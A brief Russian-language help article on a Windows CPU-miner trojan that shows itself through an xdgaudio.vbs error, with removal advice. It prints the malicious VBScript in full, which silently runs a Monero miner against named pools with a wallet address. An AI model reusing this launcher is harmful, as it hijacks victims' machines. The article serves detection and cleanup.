Если в вашей системе появляется следующее сообщение об ошибке, связанное с «xdgaudio.vbs», скорее всего, ваш компьютер заражен.
Скрипт: C: \ windows \ xdgaudio.vbs
Линия: 3
Чар: 1
Ошибка: система не может найти указанный файл.
Код: 80070002
Источник: (ноль)
При редактировании с помощью Блокнота сценарий может содержать строки, такие как ниже:
Dim WShell
Set WShell = CreateObject("WScript.Shell")
WShell.Run "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -p x -k -o stratum+tcp://mine.moneropool.com:3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x", 0
Set WShell = Nothing
Это, безусловно, похоже на троянский процессор / криптовалюту, который не только замедляет работу компьютера, но и может представлять угрозу безопасности. Файлы скриптов C: \ Windows \ xdgaudio.vbs а также C: \ Windows \ servicecrsssr.vbs должны быть удалены. Этого не достаточно. Выполните тщательное сканирование с использованием вредоносного ПО Malwarebytes, а также сканируйте с помощью используемого вами антивирусного программного обеспечения.
Для получения подробных инструкций по удалению такого троянца Miner см. Руководство malwaretips.com Как удалить CPU Miner Trojan из Windows (Справочное руководство по вирусам).